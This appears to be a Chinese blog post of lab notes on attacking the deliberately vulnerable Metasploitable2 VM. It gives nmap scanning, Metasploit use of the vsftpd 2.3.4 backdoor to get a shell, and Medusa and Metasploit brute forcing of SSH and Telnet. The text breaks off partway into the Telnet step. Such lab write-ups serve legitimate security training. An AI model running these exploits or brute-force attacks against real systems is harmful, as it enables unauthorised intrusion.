Metasploitable2靶机渗透笔记

本文详细记录了对Metasploitable2靶机的渗透过程,包括信息收集、统计和利用三个阶段。涉及的攻击手段包括VSFTPD、SSH、Telnet、CGI/FastCGI、DDoS、SMB、exec、java-rmi、ingreslock、nfs、ftp、MySQL、distccd、Postgresql、vnc、UnrealIRCd和tomcat的漏洞利用,主要使用Metasploit框架进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息收集阶段

由于是Vmware中的靶机,所以不做真实IP、旁站、C段、WAF等信息的收集

端口收集:

nmap -sS -sV 靶机IP

获得开放的服务信息:
在这里插入图片描述


统计阶段

  1. VSFTPD 2.3.4(笑脸漏洞)
  2. SSH登录爆破
  3. Telnet爆破
  4. http-CGI/FastCGI
  5. HTTP-DDOS拒绝服务攻击
  6. SMB任意命令执行
  7. exec账密爆破
  8. java-rmi反序列化
  9. ingreslock后门
  10. nfs文件共享漏洞
  11. ftp弱口令
  12. MySQL弱口令
  13. distccd任意命令执行
  14. Postgresql弱口令
  15. vnc弱口令
  16. UnrealIRCd漏洞
  17. tomcat弱口令

利用阶段

VSFTPD 2.3.4

利用方式:

  1. metasploit模块利用
  2. 笑脸:)利用(需要目标机器开启6200端口)
  3. ftp爆破

使用metasploit中的利用模块

msfconsole:进入metasploit
search vsftpd:搜索利用模块
在这里插入图片描述
use exploit/unix/ftp/vsftpd_234_backdoor:使用模块
options:查看需要配置的参数
set rhost 192.168.137.170:设置目标IP
run:开始运行

成功拿到shell

在这里插入图片描述

SSH爆破

利用方式:

  1. metasploit模块利用
  2. ssh爆破

ssh爆破
使用Medusa美杜莎工具爆破该靶机的SSH账密
medusa -M ssh -h 192.168.137.170 -U user.txt -p pass.txt -f -t 5
在这里插入图片描述

使用metasploit中的利用模块

msfconsole:进入metaspolit
search ssh_login:搜索利用模块
use auxiliary/scanner/ssh/ssh_login:使用模块
options:查看需要配置的参数
在这里插入图片描述
set rhosts 192.168.137.170:设置目标机IP
set user_file 用户名字典路径
set pass_file 密码的字典路径
set threads 10:设置线程数量
run:运行
在这里插入图片描述

Telnet爆破

利用方式:

  1. metasploit模块利用
    测试的Hydra和Medusa都无法爆破Telnet,如果是利用错误或者有其他的利用方式希望各位师傅可以为我指出,谢谢啦!

使用metasploit中的利用模块

msfconsole:进入metaspolit
search telnet_login:搜索利用模块
use scanner/telnet/telnet_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170&#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值